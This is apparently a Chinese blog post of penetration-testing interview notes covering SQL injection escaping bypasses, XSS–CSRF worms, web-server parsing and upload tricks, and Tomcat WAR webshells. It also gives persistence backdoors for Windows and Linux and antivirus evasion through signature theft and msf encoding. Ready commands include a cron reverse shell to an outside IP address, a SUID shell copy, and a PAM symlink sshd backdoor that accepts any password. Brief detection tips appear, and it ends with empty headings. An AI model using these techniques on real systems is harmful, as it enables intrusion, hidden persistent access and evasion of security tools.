基础知识

1.sql注入若对'进行转义怎么办?

判断是字符性还是数字型,数字型的话可以通过hex编码(用0x 编码表示)进行绕过.如果是字符性的话可以看看是不是gbk编码,可以在‘前面加个(%DF,%DE之类的)进行闭合,尝试二次注入,注册时输1'a会
先转义成1\'a,然后还原成1'a,若为'闭合,若修改密码取出时就会修改1用户的密码.

2.xss和csrf如何组合利用?

xss蠕虫,比如一个博客我发布了一篇带有xss的弹窗,然后这个网站修改密码还不需要原密码,用户点击弹窗可能会执行我后面服务器写好的修改密码的代码.或者让他们自动发我这个弹窗贴.

3.sql攻击大规模误报怎么快速判断是不是误报?

看返回响应包,返回状态码,看看有没有响应出什么异常.

4.fastjson指纹识别:

看看返回包数据类型有没有json,然后构造不闭合的花括号{,如果说报出albaba.fastjson,那就是fastjson,若屏蔽错误信息那就dnslog盲打.

5.web中间件的漏洞.

iis:

iis解析漏洞,使用;.进行截断,如a.asp;.jpg,其中iis分号后面的就不解析了。

asp也解析以.asa  .cer  .cdx结尾的文件. 

其次在asp目录下的其他后缀文件也会按照asp语言进行解析.如 aa.asp/xx.jpg,xx.jpg也会被解析.

put上传,这里可以先将请求头改为options,看有没有返回DAV,然后直接put上传,文件内容放在下面(post请求时的内容位置)

Apache:

apache在解析文件时会从右往左解析,当解析到可以识别的后缀就会停下.

nginx解析漏洞:

由于nginx.conf的如下配置导致nginx把以’.php’结尾的文件交给fastcgi处理,为此可以构造http://ip/uploadfiles/test.png/.php (url结尾不一定是‘.php’,任何服务器端不存在的php文件均可,比如’a.php’),这样test.png里的php语言就会被解析.

根据windows操作系统特性:

a.php.     a.php(空格)      a.php:1.jpg      a.php::$DATA    当然还有很多当我们创建文件的时候会提示文件名中不能含有<   /    |   ?  *

Tomcat:

弱口令 tomcat   tomcat

弱口令进去后上传一个jsp木马的war包,直接留下后门.

 windows权限维持:

注册表创建用户,不会被查到。检测使用D盾_web查杀工具

shift后门:将C:/windows/system32/下的sethc.exe删除如何把同目录下cmd改名字为sethc.exe.  远程登录不需要密码按5下shift,调出cmd窗口.检测就是登录输密码处按5下shift.exe,或者禁用sethc.exe.

gpedit.msc---计算机配置---Windows设置-脚本-设置脚本      

telnet服务   开启telnet服务,并且更改端口,这样就可以通过telnet来连接登录了,检测看看有没有奇怪的端口.

创建计划任务

启用Guest用户,并放在管理员用户组.

linux权限维持:

ssh公私钥,攻击者将公钥放到对方服务器/root/.ssh文件夹下,ssh登录使用私钥去和公钥匹配就不需要输入密码.

crontab 反弹shell,在主机生成1.sh文件内容为

#!/bin/bash
bash -i >& /dev/tcp/124.222.87.79/5577  0>&1
crontab -e

 */1 * * * * root /root/1.sh    #添加计划任务,这样就会每一分钟都反弹shell,攻击机  nc -lvp 5577

SUID后门

mkdir a  #找一个隐蔽的地方创建文件a 
cp /bin/sh  a    #将sh命令复制进去
chmod 4755 a   #SUID属性
./a                 #运行
检测uid文件用下面两条命令
find / -perm +4000 -ls
find / -perm -u=s -type f 2>/dev/null

软链接

软连接后门的原理是利用了PAM配置文件的作用,将sshd文件软连接名称设置为su,这样应用在启动过程中他会去PAM配置文件夹中寻找是否存在对应名称的配置信息(su),然而 su 在 pam_rootok 只检测uid 0 即可认证成功,这样就导致了可以使用任意密码登录:

ln -sf /usr/sbin/sshd /usr/local/su;/usr/local/su -oPort=11111

当执行命令后,我们就可以通过与软件的端口号对应进行登陆,且输入任意密码即可。

ssh root@192.168.45.137 -p11111

免杀手法原理:

加签名 下载地址:https://github.com/secretsquirrel/SigThief

python sigthief.py -i D:\360软件\360Safe\360Safe.exe -t payload.exe -o 1.exe
                   -i 后面接有签名的文件                -t 要签名的文件 -o  签名后的文件  

 利用msf对木马文件进行编码-捆绑->免杀,多重编码+捆绑->免杀

linux下的veil免杀:利用python进行编码.

 

java框架漏洞:

spring类型漏洞:

Spring MVC漏洞:

 

 

 

   

 

posted @ 2022-03-18 01:10  Po-Jian  阅读(187)  评论(0)    收藏  举报